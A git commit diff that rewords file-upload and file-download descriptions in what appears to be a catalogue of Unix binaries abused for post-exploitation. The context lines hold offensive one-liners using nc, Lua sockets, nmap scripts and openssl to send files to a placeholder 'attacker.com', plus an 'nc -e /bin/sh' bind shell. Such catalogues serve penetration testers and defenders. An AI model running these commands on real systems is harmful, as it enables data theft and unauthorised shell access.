Reword file upload/download descriptions

This commit is contained in:
Andrea Cardaci 2019-07-29 16:41:49 +02:00
parent ebe1181b75
commit e969daf111
6 changed files with 13 additions and 13 deletions

View File

@ -27,7 +27,7 @@ functions:
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();'
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
code: |
RHOST=attacker.com
RPORT=12345
@ -42,7 +42,7 @@ functions:
t:send(d);
t:close();'
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
- description: Fetch a remote file via TCP. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
code: |
export LPORT=12345

View File

@ -12,14 +12,14 @@ functions:
LPORT=12345
nc -l -p $LPORT -e /bin/sh
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE"
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: |
LPORT=12345
LFILE=file_to_save

View File

@ -39,13 +39,13 @@ functions:
end;c:close();f:close();' > $TF
nmap --script=$TF
file-upload:
- description: Send a file to a TCP port. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
- description: Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
code: |
RHOST=attacker.com
RPORT=8080
LFILE=file_to_send
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
@ -61,14 +61,14 @@ functions:
t:close();' > $TF
nmap --script=$TF
file-download:
- description: Fetch remote file sent to a local TCP port. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
- description: Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
code: |
RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
code: |
export LPORT=12345
export LFILE=file_to_save

View File

@ -19,7 +19,7 @@ functions:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
Send a file to a TCP port, transmission will be encrypted.
Send a local file via TCP. Transmission will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345

View File

@ -56,7 +56,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.
code: |
export RHOST=attacker.com
export RPORT=12345
@ -79,7 +79,7 @@ functions:
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `rvim` is compiled with Lua support and that `lua-socket` is installed.
code: |
export LPORT=12345
export LFILE=file_to_save

View File

@ -61,7 +61,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
- description: Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
code: |
export RHOST=attacker.com
export RPORT=12345
@ -84,7 +84,7 @@ functions:
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
- description: Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
code: |
export LPORT=12345
export LFILE=file_to_save